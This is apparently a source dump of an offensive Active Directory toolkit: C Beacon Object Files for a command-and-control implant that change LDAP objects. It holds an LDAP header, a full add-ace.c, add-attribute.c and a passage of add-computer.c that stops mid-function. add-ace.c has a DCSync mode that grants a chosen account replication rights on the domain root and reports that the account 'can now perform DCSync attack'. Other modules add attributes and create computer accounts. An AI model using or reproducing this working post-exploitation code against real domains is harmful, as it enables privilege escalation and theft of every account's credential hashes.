#define UF_TEMP_DUPLICATE_ACCOUNT           0x00000100  // Local user account
#define UF_NORMAL_ACCOUNT                   0x00000200  // Default account type (user)
#define UF_INTERDOMAIN_TRUST_ACCOUNT        0x00000800  // Interdomain trust account
#define UF_WORKSTATION_TRUST_ACCOUNT        0x00001000  // Workstation trust account (computer)
#define UF_SERVER_TRUST_ACCOUNT             0x00002000  // Domain controller account
#define UF_DONT_EXPIRE_PASSWD               0x00010000  // Password never expires
#define UF_MNS_LOGON_ACCOUNT                0x00020000  // MNS logon account
#define UF_SMARTCARD_REQUIRED               0x00040000  // Smart card required for interactive logon
#define UF_TRUSTED_FOR_DELEGATION           0x00080000  // Account trusted for Kerberos delegation
#define UF_NOT_DELEGATED                    0x00100000  // Account cannot be delegated
#define UF_USE_DES_KEY_ONLY                 0x00200000  // Restrict to DES encryption types
#define UF_DONT_REQ_PREAUTH                 0x00400000  // Kerberos pre-authentication not required (AS-REP roasting!)
#define UF_PASSWORD_EXPIRED                 0x00800000  // Password expired
#define UF_TRUSTED_TO_AUTH_FOR_DELEGATION   0x01000000  // Account enabled for delegation (constrained delegation)
#define UF_NO_AUTH_DATA_REQUIRED            0x02000000  // Account does not require Kerberos PAC
#define UF_PARTIAL_SECRETS_ACCOUNT          0x04000000  // RODC partial secrets account

// Account type flags (should never be cleared)
#define UF_ACCOUNT_TYPE_MASK (UF_NORMAL_ACCOUNT | UF_WORKSTATION_TRUST_ACCOUNT | UF_SERVER_TRUST_ACCOUNT | UF_INTERDOMAIN_TRUST_ACCOUNT)

// NETAPI32 imports for DC discovery
typedef struct _DOMAIN_CONTROLLER_INFOA {
    LPSTR DomainControllerName;
    LPSTR DomainControllerAddress;
    ULONG DomainControllerAddressType;
    GUID DomainGuid;
    LPSTR DomainName;
    LPSTR DnsForestName;
    ULONG Flags;
    LPSTR DcSiteName;
    LPSTR ClientSiteName;
} DOMAIN_CONTROLLER_INFOA, *PDOMAIN_CONTROLLER_INFOA;

DECLSPEC_IMPORT DWORD WINAPI NETAPI32$DsGetDcNameA(
    LPCSTR ComputerName,
    LPCSTR DomainName,
    GUID *DomainGuid,
    LPCSTR SiteName,
    ULONG Flags,
    PDOMAIN_CONTROLLER_INFOA *DomainControllerInfo
);

DECLSPEC_IMPORT DWORD WINAPI NETAPI32$NetApiBufferFree(LPVOID Buffer);

// KERNEL32 imports
DECLSPEC_IMPORT HLOCAL WINAPI KERNEL32$LocalFree(HLOCAL hMem);

// ADVAPI32 imports for security descriptor operations
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$ConvertSecurityDescriptorToStringSecurityDescriptorA(
    PSECURITY_DESCRIPTOR SecurityDescriptor,
    DWORD RequestedStringSDRevision,
    DWORD SecurityInformation,
    LPSTR* StringSecurityDescriptor,
    PULONG StringSecurityDescriptorLen
);

// LDAP API function imports - ANSI versions
DECLSPEC_IMPORT LDAP* WLDAP32$ldap_init(PCHAR HostName, ULONG PortNumber);
DECLSPEC_IMPORT ULONG WLDAP32$ldap_set_option(LDAP* ld, int option, const void* invalue);
DECLSPEC_IMPORT ULONG WLDAP32$ldap_get_option(LDAP* ld, int option, void* outvalue);
DECLSPEC_IMPORT ULONG WLDAP32$ldap_bind_s(LDAP* ld, const PCHAR dn, const PCHAR cred, ULONG method);
DECLSPEC_IMPORT ULONG WLDAP32$ldap_unbind_s(LDAP* ld);
DECLSPEC_IMPORT ULONG WLDAP32$ldap_add_s(LDAP* ld, const PCHAR dn, LDAPModA** attrs);
DECLSPEC_IMPORT ULONG WLDAP32$ldap_modify_s(LDAP* ld, const PCHAR dn, LDAPModA** mods);
DECLSPEC_IMPORT ULONG WLDAP32$ldap_count_values(PCHAR *vals);
DECLSPEC_IMPORT ULONG WLDAP32$ldap_delete_s(LDAP* ld, const PCHAR dn);
DECLSPEC_IMPORT ULONG WLDAP32$ldap_search_s(LDAP* ld, const PCHAR base, ULONG scope, const PCHAR filter, PCHAR* attrs, ULONG attrsonly, LDAPMessage** res);
DECLSPEC_IMPORT ULONG WLDAP32$ldap_search_ext_s(LDAP* ld, const PCHAR base, ULONG scope, const PCHAR filter, PCHAR* attrs, ULONG attrsonly, PLDAPControlA* ServerControls, PLDAPControlA* ClientControls, struct l_timeval* timeout, ULONG SizeLimit, LDAPMessage** res);
DECLSPEC_IMPORT ULONG WLDAP32$ldap_create_page_control(LDAP* ld, ULONG PageSize, struct berval* Cookie, UCHAR IsCritical, PLDAPControlA* Control);
DECLSPEC_IMPORT ULONG WLDAP32$ldap_control_freeA(LDAPControlA* Control);
DECLSPEC_IMPORT LDAPMessage* WLDAP32$ldap_first_entry(LDAP* ld, LDAPMessage* res);
DECLSPEC_IMPORT LDAPMessage* WLDAP32$ldap_next_entry(LDAP* ld, LDAPMessage* entry);
DECLSPEC_IMPORT PCHAR* WLDAP32$ldap_get_values(LDAP* ld, LDAPMessage* entry, const PCHAR attr);
DECLSPEC_IMPORT ULONG WLDAP32$ldap_value_free(PCHAR* vals);
DECLSPEC_IMPORT ULONG WLDAP32$ldap_msgfree(LDAPMessage* res);
DECLSPEC_IMPORT PCHAR WLDAP32$ldap_first_attribute(LDAP* ld, LDAPMessage* entry, BerElement** ber);
DECLSPEC_IMPORT PCHAR WLDAP32$ldap_next_attribute(LDAP* ld, LDAPMessage* entry, BerElement* ber);
DECLSPEC_IMPORT void WLDAP32$ldap_memfree(PCHAR block);
DECLSPEC_IMPORT void WLDAP32$ber_free(BerElement* ber, int freebuf);
DECLSPEC_IMPORT ULONG WLDAP32$ldap_count_entries(LDAP* ld, LDAPMessage* res);
DECLSPEC_IMPORT PCHAR WLDAP32$ldap_err2stringA(ULONG err);
DECLSPEC_IMPORT struct berval** WLDAP32$ldap_get_values_len(LDAP* ld, LDAPMessage* entry, const PCHAR attr);
DECLSPEC_IMPORT ULONG WLDAP32$ldap_value_free_len(struct berval** vals);
DECLSPEC_IMPORT ULONG WLDAP32$ldap_extended_operation_sA(LDAP* ld, PCHAR Oid, struct berval* Data, PLDAPControlA* ServerControls, PLDAPControlA* ClientControls, PCHAR* ReturnedOid, struct berval** ReturnedData);

// Shared function declarations
char* GetDCHostName();
char* BuildDefaultNamingContextFromDC(const char* dcHostname);
LDAP* InitializeLDAPConnection(const char* dcAddress, BOOL useLdaps, char** outDcHostname);
char* GetDefaultNamingContext(LDAP* ld, const char* dcHostname);
char* FindObjectDN(LDAP* ld, const char* samAccountName, const char* searchBase);
void PrintLdapError(const char* context, ULONG ldapError);
BERVAL* EncodePassword(const char* password);
void CleanupLDAP(LDAP* ld);
LDAPControlA* BuildSDFlagsControl(DWORD sdFlags, char* buffer, struct berval* bervalStorage);

// Helper string conversion functions
char* WCharToChar(const wchar_t* wstr);
wchar_t* CharToWChar(const char* str);

#endif // LDAP_COMMON_H

================================================
FILE: AD-BOF/LDAP-BOF/src/add/add-ace.c
================================================
#include <windows.h>
#include "beacon.h"
#include "ldap_common.c"
#include "acl_common.c"

DECLSPEC_IMPORT void* __cdecl MSVCRT$memset(void* dest, int c, size_t count);

// Structure to hold ACE parameters for adding
typedef struct _ACE_TO_ADD {
    ACCESS_MASK accessMask;
    BYTE aceType;
    BYTE aceFlags;
    GUID* pObjectTypeGuid;
    GUID* pInheritedObjectTypeGuid;
} ACE_TO_ADD;

void go(char *args, int alen) {
    datap parser;
    BeaconDataParse(&parser, args, alen);
    
    // Parse arguments: 
    // target_identifier, is_target_dn, trustee_identifier, is_trustee_dn, access_mask, ace_type, ace_flags,
    // object_type_guid (optional), inherited_object_type_guid (optional),
    // search_ou, dc_address, use_ldaps
    char* targetIdentifier = ValidateInput(BeaconDataExtract(&parser, NULL));
    int isTargetDN = BeaconDataInt(&parser);
    char* trusteeIdentifier = ValidateInput(BeaconDataExtract(&parser, NULL));
    int isTrusteeDN = BeaconDataInt(&parser);
    char* accessMaskStr = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* aceTypeStr = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* aceFlagsStr = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* objectTypeGuidStr = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* inheritedObjectTypeGuidStr = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* searchOu = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* dcAddress = ValidateInput(BeaconDataExtract(&parser, NULL));
    int useLdaps = BeaconDataInt(&parser);
    
    // Validate required parameters
    if (!targetIdentifier || MSVCRT$strlen(targetIdentifier) == 0) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Target identifier is required");
        return;
    }
    
    if (!trusteeIdentifier || MSVCRT$strlen(trusteeIdentifier) == 0) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Trustee identifier is required");
        return;
    }
    
    if (!accessMaskStr || MSVCRT$strlen(accessMaskStr) == 0) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Access mask is required");
        return;
    }
    
    
    // Check if this is a DCSync operation (requires multiple ACEs)
    BOOL isDCSync = IsDCSyncKeyword(accessMaskStr);
    
    // Prepare ACE(s) to add
    ACE_TO_ADD* acesToAdd = NULL;
    DWORD aceCount = 0;
    GUID dcsyncGuid1, dcsyncGuid2;
    GUID objectTypeGuid, inheritedObjectTypeGuid;
    
    if (isDCSync) {
        // DCSync requires 2 ACEs with different GUIDs
        BeaconPrintf(CALLBACK_OUTPUT, "[*] DCSync operation detected");
        BeaconPrintf(CALLBACK_OUTPUT, "[*] Will add DS-Replication-Get-Changes and DS-Replication-Get-Changes-All");
        
        // Parse the two DCSync GUIDs
        MSVCRT$memset(&dcsyncGuid1, 0, sizeof(GUID));
        MSVCRT$memset(&dcsyncGuid2, 0, sizeof(GUID));
        
        if (!StringToGuid(GUID_DS_REPLICATION_GET_CHANGES, &dcsyncGuid1) ||
            !StringToGuid(GUID_DS_REPLICATION_GET_CHANGES_ALL, &dcsyncGuid2)) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to parse DCSync GUIDs");
            return;
        }
        
        // Allocate array for 2 ACEs
        acesToAdd = (ACE_TO_ADD*)MSVCRT$malloc(2 * sizeof(ACE_TO_ADD));
        if (!acesToAdd) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Memory allocation failed");
            return;
        }
        
        // First ACE: DS-Replication-Get-Changes
        acesToAdd[0].accessMask = ADS_RIGHT_DS_CONTROL_ACCESS;
        acesToAdd[0].aceType = ACCESS_ALLOWED_OBJECT_ACE_TYPE;
        acesToAdd[0].aceFlags = 0;
        acesToAdd[0].pObjectTypeGuid = &dcsyncGuid1;
        acesToAdd[0].pInheritedObjectTypeGuid = NULL;
        
        // Second ACE: DS-Replication-Get-Changes-All
        acesToAdd[1].accessMask = ADS_RIGHT_DS_CONTROL_ACCESS;
        acesToAdd[1].aceType = ACCESS_ALLOWED_OBJECT_ACE_TYPE;
        acesToAdd[1].aceFlags = 0;
        acesToAdd[1].pObjectTypeGuid = &dcsyncGuid2;
        acesToAdd[1].pInheritedObjectTypeGuid = NULL;
        
        aceCount = 2;
        
    } else {
        // Single ACE - parse parameters
        BeaconPrintf(CALLBACK_OUTPUT, "[*] Access Mask: %s", accessMaskStr);
        
        ACCESS_MASK accessMask = ParseAccessMask(accessMaskStr);
        if (accessMask == 0) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to parse access mask");
            return;
        }
        
        BYTE aceType = ParseAceType(aceTypeStr);
        BYTE aceFlags = ParseAceFlags(aceFlagsStr);
        
        BeaconPrintf(CALLBACK_OUTPUT, "[*] Parsed access mask: 0x%08x", accessMask);
        BeaconPrintf(CALLBACK_OUTPUT, "[*] Parsed ACE type: 0x%02x (%s)", aceType, GetAceTypeString(aceType));
        BeaconPrintf(CALLBACK_OUTPUT, "[*] Parsed ACE flags: 0x%02x", aceFlags);
        
        // Parse GUIDs if provided
        GUID* pObjectTypeGuid = NULL;
        GUID* pInheritedObjectTypeGuid = NULL;
        
        if (objectTypeGuidStr && MSVCRT$strlen(objectTypeGuidStr) > 0) {
            MSVCRT$memset(&objectTypeGuid, 0, sizeof(GUID));
            if (StringToGuid(objectTypeGuidStr, &objectTypeGuid)) {
                pObjectTypeGuid = &objectTypeGuid;
                BeaconPrintf(CALLBACK_OUTPUT, "[+] Parsed Object Type GUID");
            } else {
                BeaconPrintf(CALLBACK_ERROR, "[-] Failed to parse Object Type GUID");
                return;
            }
        }
        
        if (inheritedObjectTypeGuidStr && MSVCRT$strlen(inheritedObjectTypeGuidStr) > 0) {
            MSVCRT$memset(&inheritedObjectTypeGuid, 0, sizeof(GUID));
            if (StringToGuid(inheritedObjectTypeGuidStr, &inheritedObjectTypeGuid)) {
                pInheritedObjectTypeGuid = &inheritedObjectTypeGuid;
                BeaconPrintf(CALLBACK_OUTPUT, "[+] Parsed Inherited Object Type GUID");
            } else {
                BeaconPrintf(CALLBACK_ERROR, "[-] Failed to parse Inherited Object Type GUID");
                return;
            }
        }
        
        if (aceTypeStr && MSVCRT$strlen(aceTypeStr) > 0) {
            BeaconPrintf(CALLBACK_OUTPUT, "[*] ACE Type: %s", aceTypeStr);
        }
        if (aceFlagsStr && MSVCRT$strlen(aceFlagsStr) > 0) {
            BeaconPrintf(CALLBACK_OUTPUT, "[*] ACE Flags: %s", aceFlagsStr);
        }
        
        // Allocate single ACE
        acesToAdd = (ACE_TO_ADD*)MSVCRT$malloc(sizeof(ACE_TO_ADD));
        if (!acesToAdd) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Memory allocation failed");
            return;
        }
        
        acesToAdd[0].accessMask = accessMask;
        acesToAdd[0].aceType = aceType;
        acesToAdd[0].aceFlags = aceFlags;
        acesToAdd[0].pObjectTypeGuid = pObjectTypeGuid;
        acesToAdd[0].pInheritedObjectTypeGuid = pInheritedObjectTypeGuid;
        
        aceCount = 1;
    }
    
    // Display optional parameters
    if (searchOu && MSVCRT$strlen(searchOu) > 0) {
        BeaconPrintf(CALLBACK_OUTPUT, "[*] Search OU: %s", searchOu);
    }
    if (dcAddress && MSVCRT$strlen(dcAddress) > 0) {
    }
    if (useLdaps) {
    }
    
    // Initialize LDAP connection
    BeaconPrintf(CALLBACK_OUTPUT, "\n[*] Initializing LDAP connection...");
    char* dcHostname = NULL;
    LDAP* ld = InitializeLDAPConnection(dcAddress, useLdaps, &dcHostname);
    if (!ld) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to initialize LDAP connection");
        if (acesToAdd) MSVCRT$free(acesToAdd);
        return;
    }
    
    // Get default naming context
    char* defaultNC = GetDefaultNamingContext(ld, dcHostname);
    if (!defaultNC) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to get default naming context");
        if (dcHostname) MSVCRT$free(dcHostname);
        if (acesToAdd) MSVCRT$free(acesToAdd);
        CleanupLDAP(ld);
        return;
    }
    
    // Variables for cleanup
    char* targetDN = NULL;
    char* trusteeDN = NULL;
    PSID pTrusteeSid = NULL;
    BERVAL* sdBerval = NULL;
    PACL pNewDacl = NULL;
    BERVAL* newSdBerval = NULL;
    
    // Resolve target DN
    if (isDCSync && !isTargetDN && MSVCRT$strlen(targetIdentifier) == 0) {
        // For DCSync, empty target means domain root
        size_t len = MSVCRT$strlen(defaultNC) + 1;
        targetDN = (char*)MSVCRT$malloc(len);
        if (targetDN) {
            MSVCRT$strcpy(targetDN, defaultNC);
            BeaconPrintf(CALLBACK_OUTPUT, "[*] Using domain root: %s", targetDN);
        }
    } else if (isTargetDN) {
        size_t len = MSVCRT$strlen(targetIdentifier) + 1;
        targetDN = (char*)MSVCRT$malloc(len);
        if (targetDN) {
            MSVCRT$strcpy(targetDN, targetIdentifier);
        }
    } else {
        char* searchBase = (searchOu && MSVCRT$strlen(searchOu) > 0) ? searchOu : defaultNC;
        targetDN = FindObjectDN(ld, targetIdentifier, searchBase);
        if (!targetDN) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Target '%s' not found", targetIdentifier);
            goto cleanup;
        }
    }
    
    if (!targetDN) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to resolve target DN");
        goto cleanup;
    }
    
    // Resolve trustee DN and get SID
    
    if (isTrusteeDN) {
        size_t len = MSVCRT$strlen(trusteeIdentifier) + 1;
        trusteeDN = (char*)MSVCRT$malloc(len);
        if (trusteeDN) {
            MSVCRT$strcpy(trusteeDN, trusteeIdentifier);
        }
    } else {
        char* searchBase = (searchOu && MSVCRT$strlen(searchOu) > 0) ? searchOu : defaultNC;
        trusteeDN = FindObjectDN(ld, trusteeIdentifier, searchBase);
        if (!trusteeDN) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Trustee '%s' not found", trusteeIdentifier);
            goto cleanup;
        }
        BeaconPrintf(CALLBACK_OUTPUT, "[+] Resolved trustee DN: %s", trusteeDN);
    }
    
    // Get trustee's SID
    pTrusteeSid = GetObjectSid(ld, trusteeDN);
    if (!pTrusteeSid) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to get trustee's objectSid");
        goto cleanup;
    }
    
    if (!ADVAPI32$IsValidSid(pTrusteeSid)) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Retrieved trustee SID is invalid");
        goto cleanup;
    }
    
    char* trusteeSidStr = SidToString(pTrusteeSid);
    if (trusteeSidStr) {
        BeaconPrintf(CALLBACK_OUTPUT, "[+] Trustee SID: %s", trusteeSidStr);
        MSVCRT$free(trusteeSidStr);
    }
    
    // Read current security descriptor
    BeaconPrintf(CALLBACK_OUTPUT, "\n[*] Reading security descriptor...");
    sdBerval = ReadSecurityDescriptor(ld, targetDN);
    if (!sdBerval) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to read security descriptor");
        goto cleanup;
    }
    
    BeaconPrintf(CALLBACK_OUTPUT, "[+] Read security descriptor (%d bytes)", sdBerval->bv_len);
    
    // Get current DACL
    PSECURITY_DESCRIPTOR pSD = (PSECURITY_DESCRIPTOR)sdBerval->bv_val;
    PACL pOldDacl = NULL;
    BOOL daclPresent = FALSE;
    BOOL daclDefaulted = FALSE;
    
    if (!ADVAPI32$GetSecurityDescriptorDacl(pSD, &daclPresent, &pOldDacl, &daclDefaulted)) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to get DACL from security descriptor");
        goto cleanup;
    }
    
    if (!daclPresent) {
        BeaconPrintf(CALLBACK_OUTPUT, "[*] No DACL present - will create new one");
    } else if (pOldDacl) {
        ACL_SIZE_INFORMATION aclInfo;
        if (ADVAPI32$GetAclInformation(pOldDacl, &aclInfo, sizeof(aclInfo), AclSizeInformation)) {
            BeaconPrintf(CALLBACK_OUTPUT, "[+] Current DACL has %d ACE(s)", aclInfo.AceCount);
        }
    }
    
    // Add ACE(s) in a loop
    BeaconPrintf(CALLBACK_OUTPUT, "\n[*] Adding %d ACE(s)...", aceCount);
    
    pNewDacl = pOldDacl; // Start with existing DACL
    
    for (DWORD i = 0; i < aceCount; i++) {
        ACE_TO_ADD* currentAce = &acesToAdd[i];
        
        if (isDCSync) {
            char* guidName = GetGuidFriendlyName(currentAce->pObjectTypeGuid);
            BeaconPrintf(CALLBACK_OUTPUT, "[*] Adding ACE %d/%d: %s", i+1, aceCount, 
                        guidName ? guidName : "Extended Right");
            if (guidName) MSVCRT$free(guidName);
        } else {
            BeaconPrintf(CALLBACK_OUTPUT, "[*] Adding ACE: Access=0x%08x, Type=%s", 
                        currentAce->accessMask, GetAceTypeString(currentAce->aceType));
        }
        
        // Create new DACL with this ACE
        PACL pTempDacl = CreateNewDaclWithAce(
            pNewDacl,
            pTrusteeSid,
            currentAce->accessMask,
            currentAce->aceType,
            currentAce->aceFlags,
            currentAce->pObjectTypeGuid,
            currentAce->pInheritedObjectTypeGuid
        );
        
        if (!pTempDacl) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to create DACL with ACE %d", i+1);
            // If this isn't the first ACE, free the previous new DACL
            if (i > 0 && pNewDacl != pOldDacl) {
                MSVCRT$free(pNewDacl);
            }
            goto cleanup;
        }
        
        // Free the previous new DACL if we're not on the first iteration
        if (i > 0 && pNewDacl != pOldDacl) {
            MSVCRT$free(pNewDacl);
        }
        
        pNewDacl = pTempDacl;
        BeaconPrintf(CALLBACK_OUTPUT, "[+] ACE %d/%d added successfully", i+1, aceCount);
    }
    
    BeaconPrintf(CALLBACK_OUTPUT, "[+] All ACEs added to DACL");
    
    // Build new security descriptor
    BeaconPrintf(CALLBACK_OUTPUT, "\n[*] Building new security descriptor...");
    
    BYTE absoluteSDBuffer[SECURITY_DESCRIPTOR_MIN_LENGTH];
    PSECURITY_DESCRIPTOR pNewSD = (PSECURITY_DESCRIPTOR)absoluteSDBuffer;
    
    if (!ADVAPI32$InitializeSecurityDescriptor(pNewSD, SECURITY_DESCRIPTOR_REVISION)) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to initialize security descriptor");
        goto cleanup;
    }
    
    // Copy owner and group from original
    PSID pOwner = NULL;
    BOOL ownerDefaulted = FALSE;
    ADVAPI32$GetSecurityDescriptorOwner(pSD, &pOwner, &ownerDefaulted);
    if (pOwner) {
        ADVAPI32$SetSecurityDescriptorOwner(pNewSD, pOwner, ownerDefaulted);
    }
    
    PSID pGroup = NULL;
    BOOL groupDefaulted = FALSE;
    ADVAPI32$GetSecurityDescriptorGroup(pSD, &pGroup, &groupDefaulted);
    if (pGroup) {
        ADVAPI32$SetSecurityDescriptorGroup(pNewSD, pGroup, groupDefaulted);
    }
    
    // Set the new DACL
    if (!ADVAPI32$SetSecurityDescriptorDacl(pNewSD, TRUE, pNewDacl, FALSE)) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to set DACL");
        goto cleanup;
    }
    
    // Copy SACL if present
    PACL pSacl = NULL;
    BOOL saclPresent = FALSE;
    BOOL saclDefaulted = FALSE;
    if (ADVAPI32$GetSecurityDescriptorSacl(pSD, &saclPresent, &pSacl, &saclDefaulted)) {
        if (saclPresent) {
            ADVAPI32$SetSecurityDescriptorSacl(pNewSD, TRUE, pSacl, saclDefaulted);
        }
    }
    
    // Convert to self-relative format for LDAP
    newSdBerval = ConvertSecurityDescriptorToBerval(pNewSD);
    if (!newSdBerval) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to convert security descriptor");
        goto cleanup;
    }
    
    BeaconPrintf(CALLBACK_OUTPUT, "[+] Security descriptor ready (%d bytes)", newSdBerval->bv_len);
    
    // Write back to LDAP
    BeaconPrintf(CALLBACK_OUTPUT, "\n[*] Writing modified security descriptor...");
    BOOL writeSuccess = WriteSecurityDescriptor(ld, targetDN, newSdBerval);
    
    if (writeSuccess) {
        BeaconPrintf(CALLBACK_OUTPUT, "\n[+] SUCCESS: ACE(s) added successfully!");
        BeaconPrintf(CALLBACK_OUTPUT, "[+] Added: %d ACE(s)", aceCount);
        
        if (isDCSync) {
            BeaconPrintf(CALLBACK_OUTPUT, "[+] DCSync rights granted, Trustee can now perform DCSync attack");
        }
        
        // Verify
        BeaconPrintf(CALLBACK_OUTPUT, "\n[*] Verifying changes...");
        BERVAL* verifyBerval = ReadSecurityDescriptor(ld, targetDN);
        if (verifyBerval) {
            PSD_INFO verifyInfo = ParseSecurityDescriptor((BYTE*)verifyBerval->bv_val, 
                                                          verifyBerval->bv_len);
            if (verifyInfo) {
                BeaconPrintf(CALLBACK_OUTPUT, "[+] Verification: DACL now has %d ACE(s)", 
                            verifyInfo->DaclAceCount);
                FreeSecurityDescriptorInfo(verifyInfo);
            }
            MSVCRT$free(verifyBerval->bv_val);
            MSVCRT$free(verifyBerval);
        }
    } else {
        BeaconPrintf(CALLBACK_ERROR, "\n[-] FAILED to add ACE(s)");
    }

cleanup:
    // Free all allocated resources
    if (newSdBerval) {
        if (newSdBerval->bv_val) MSVCRT$free(newSdBerval->bv_val);
        MSVCRT$free(newSdBerval);
    }
    if (pNewDacl && pNewDacl != pOldDacl) MSVCRT$free(pNewDacl);
    if (sdBerval) {
        if (sdBerval->bv_val) MSVCRT$free(sdBerval->bv_val);
        MSVCRT$free(sdBerval);
    }
    if (pTrusteeSid) MSVCRT$free(pTrusteeSid);
    if (trusteeDN) MSVCRT$free(trusteeDN);
    if (targetDN) MSVCRT$free(targetDN);
    if (defaultNC) MSVCRT$free(defaultNC);
    if (dcHostname) MSVCRT$free(dcHostname);
    if (acesToAdd) MSVCRT$free(acesToAdd);
    CleanupLDAP(ld);
    
}

================================================
FILE: AD-BOF/LDAP-BOF/src/add/add-attribute.c
================================================
#include <windows.h>
#include "beacon.h"
#include "ldap_common.c"

void go(char *args, int alen) {
    datap parser;
    BeaconDataParse(&parser, args, alen);

    // Parse arguments: target_identifier, is_dn, attribute, value, search_ou, dc_address, use_ldaps
    char* targetIdentifier = ValidateInput(BeaconDataExtract(&parser, NULL));
    int isTargetDN = BeaconDataInt(&parser);
    char* attribute = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* value = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* searchOu = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* dcAddress = ValidateInput(BeaconDataExtract(&parser, NULL));
    int useLdaps = BeaconDataInt(&parser);

    if (!targetIdentifier || MSVCRT$strlen(targetIdentifier) == 0) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Target identifier is required");
        return;
    }

    if (!attribute || MSVCRT$strlen(attribute) == 0) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Attribute name is required");
        return;
    }

    if (!value || MSVCRT$strlen(value) == 0) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Value is required");
        return;
    }

    // Initialize LDAP connection
    char* dcHostname = NULL;
    LDAP* ld = InitializeLDAPConnection(dcAddress, useLdaps, &dcHostname);
    if (!ld) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to initialize LDAP connection");
        return;
    }

    // Get default naming context
    char* defaultNC = NULL;
    if (!isTargetDN) {
        defaultNC = GetDefaultNamingContext(ld, dcHostname);
        if (!defaultNC) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to get default naming context");
            if (dcHostname) MSVCRT$free(dcHostname);
            CleanupLDAP(ld);
            return;
        }
    }

    // Resolve target DN
    char* targetDN = NULL;
    if (isTargetDN) {
        size_t len = MSVCRT$strlen(targetIdentifier) + 1;
        targetDN = (char*)MSVCRT$malloc(len);
        if (targetDN) {
            MSVCRT$strcpy(targetDN, targetIdentifier);
        }
    } else {
        char* searchBase = (searchOu && MSVCRT$strlen(searchOu) > 0) ? searchOu : defaultNC;
        targetDN = FindObjectDN(ld, targetIdentifier, searchBase);
        if (!targetDN) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Target '%s' not found", targetIdentifier);
            if (defaultNC) MSVCRT$free(defaultNC);
            if (dcHostname) MSVCRT$free(dcHostname);
            CleanupLDAP(ld);
            return;
        }
    }

    // Add attribute value
    char* attr_values[] = { value, NULL };
    LDAPModA attr_mod;
    attr_mod.mod_op = LDAP_MOD_ADD;
    attr_mod.mod_type = attribute;
    attr_mod.mod_vals.modv_strvals = attr_values;

    LDAPModA* mods[] = { &attr_mod, NULL };

    ULONG result = WLDAP32$ldap_modify_s(ld, targetDN, mods);

    if (result == LDAP_SUCCESS) {
        BeaconPrintf(CALLBACK_OUTPUT, "[+] Successfully added value to '%s'", attribute);
    } else if (result == LDAP_ATTRIBUTE_OR_VALUE_EXISTS) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Value already exists for attribute '%s'", attribute);
    } else {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to add attribute value");
        PrintLdapError("Add attribute", result);
    }

    MSVCRT$free(targetDN);
    if (defaultNC) MSVCRT$free(defaultNC);
    if (dcHostname) MSVCRT$free(dcHostname);
    CleanupLDAP(ld);
}


================================================
FILE: AD-BOF/LDAP-BOF/src/add/add-computer.c
================================================
#include <windows.h>
#include "beacon.h"
#include "ldap_common.c"

void go(char *args, int alen) {
    datap parser;
    BeaconDataParse(&parser, args, alen);
    
    // Parse arguments: computername_or_dn, password, ou_path, dc_address, disabled, use_ldaps
    char* computerIdentifier = ValidateInput(BeaconDataExtract(&parser, NULL));
    int isComputerDN = BeaconDataInt(&parser);
    char* password = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* ouPath = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* dcAddress = ValidateInput(BeaconDataExtract(&parser, NULL));
    int disabled = BeaconDataInt(&parser);
    int useLdaps = BeaconDataInt(&parser);
    
    if (!computerIdentifier || MSVCRT$strlen(computerIdentifier) == 0) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Computer name or DN is required");
        return;
    }
    
    // Force LDAPS if password is provided
    BOOL requireLdaps = (password && MSVCRT$strlen(password) > 0) || useLdaps;
    
    // Initialize LDAP connection
    char* dcHostname = NULL;
    LDAP* ld = InitializeLDAPConnection(dcAddress, useLdaps, &dcHostname);
    if (!ld) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to initialize LDAP connection");
        return;
    }
    
    // Get default naming context - will build from hostname if possible
    char* defaultNC = GetDefaultNamingContext(ld, dcHostname);
    if (!defaultNC) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to get default naming context");
        if (dcHostname) MSVCRT$free(dcHostname);
        CleanupLDAP(ld);
        return;
    }
    
    // Extract domain name from defaultNC for SPNs and dnsHostName
    char domainName[256] = {0};
    char* dcPtr = defaultNC;
    int domainPos = 0;
    int firstDC = 1;
    
    while (*dcPtr && domainPos < 255) {
        if (dcPtr[0] == 'D' && dcPtr[1] == 'C' && dcPtr[2] == '=') {
            dcPtr += 3;
            if (!firstDC) domainName[domainPos++] = '.';
            firstDC = 0;
            while (*dcPtr && *dcPtr != ',' && domainPos < 255) {
                char ch = *dcPtr;
                if (ch >= 'A' && ch <= 'Z') ch += 32; // lowercase
                domainName[domainPos++] = ch;
